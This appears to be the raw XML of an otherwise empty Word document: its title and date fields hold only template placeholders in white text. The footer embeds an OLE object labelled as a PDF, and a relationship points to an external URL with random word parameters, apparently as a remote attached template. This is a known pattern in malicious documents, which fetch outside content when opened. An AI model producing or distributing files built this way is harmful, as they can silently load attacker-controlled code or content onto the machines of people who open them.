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D0" w:rsidRDefault="009766D0"/>
    <w:sectPr w:rsidR="009766D0" w:rsidSect="002B6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FB" w:rsidRDefault="007138FB" w:rsidP="00C255AA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="007138FB" w:rsidRDefault="007138FB" w:rsidP="00C2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A" w:rsidRDefault="00C25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7356"/>
      <w:gridCol w:w="2220"/>
    </w:tblGrid>
    <w:tr w:rsidR="007A1EC0">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="918" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="007A1EC0" w:rsidRDefault="007A1EC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object w:dxaOrig="7140" w:dyaOrig="10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7pt;height:505.2pt" o:ole="">
                <v:imagedata r:id="rId1" o:title=""/>
              </v:shape>
              <o:OLEObject Type="Embed" ProgID="AcroExch.Document.DC" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1817697249" r:id="rId2"/>
            </w:object>
          </w:r>
          <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
            <w:r w:rsidRPr="007A1EC0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7A1EC0" w:rsidRDefault="007A1EC0">
          <w:pPr>
            <w:pStyle w:val="Footer"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00C255AA" w:rsidRDefault="00C255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A" w:rsidRDefault="00C25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FB" w:rsidRDefault="007138FB" w:rsidP="00C255AA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="007138FB" w:rsidRDefault="007138FB" w:rsidP="00C2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A" w:rsidRDefault="00C255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877"/>
      <w:gridCol w:w="6713"/>
    </w:tblGrid>
    <w:tr w:rsidR="00C255AA">
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="FFFFFF" w:themeColor="background1"/>
          </w:rPr>
          <w:alias w:val="Date"/>
          <w:id w:val="77625188"/>
          <w:placeholder>
            <w:docPart w:val="2123B4EBAD9C423081812DC7FD1BF02A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255AA" w:rsidRDefault="00C255AA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[Pick the date]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C255AA" w:rsidRDefault="00C255AA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FDFEF4C94A8846C19F69BAA278004277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Type the document title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C255AA" w:rsidRDefault="00C255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AA" w:rsidRDefault="00C255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5AA"/>
    <w:rsid w:val="002B6108"/>
    <w:rsid w:val="007138FB"/>
    <w:rsid w:val="007A1EC0"/>
    <w:rsid w:val="009766D0"/>
    <w:rsid w:val="00C2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ttachedTemplate r:id="rId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AA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2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AA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2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yamantap.me/hLp0Ja?&amp;chronometer=envious&amp;revolver=flowery&amp;mezzanine=wistful&amp;rest=loud&amp;geranium=hushed" TargetMode="External"/></Relationships>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23B4EBAD9C423081812DC7FD1BF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48FF-F57F-4093-A14A-167A8E5880BA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00E80A43" w:rsidRDefault="006A4345" w:rsidP="006A4345">
          <w:pPr>
            <w:pStyle w:val="2123B4EBAD9C423081812DC7FD1BF02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DFEF4C94A8846C19F69BAA27800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3158-5A43-4021-AC70-97C3455FF87A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00E80A43" w:rsidRDefault="006A4345" w:rsidP="006A4345">
          <w:pPr>
            <w:pStyle w:val="FDFEF4C94A8846C19F69BAA278004277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4345"/>
    <w:rsid w:val="006A4345"/>
    <w:rsid w:val="00E80A43"/>
    <w:rsid w:val="00F7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7B98452F3447F3AB843E1E575647F6">
    <w:name w:val="117B98452F3447F3AB843E1E575647F6"/>
    <w:rsid w:val="006A4345"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2123B4EBAD9C423081812DC7FD1BF02A">
    <w:name w:val="2123B4EBAD9C423081812DC7FD1BF02A"/>
    <w:rsid w:val="006A4345"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FDFEF4C94A8846C19F69BAA278004277">
    <w:name w:val="FDFEF4C94A8846C19F69BAA278004277"/>
    <w:rsid w:val="006A43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91974</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>91974</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-26T01:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-26T01:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>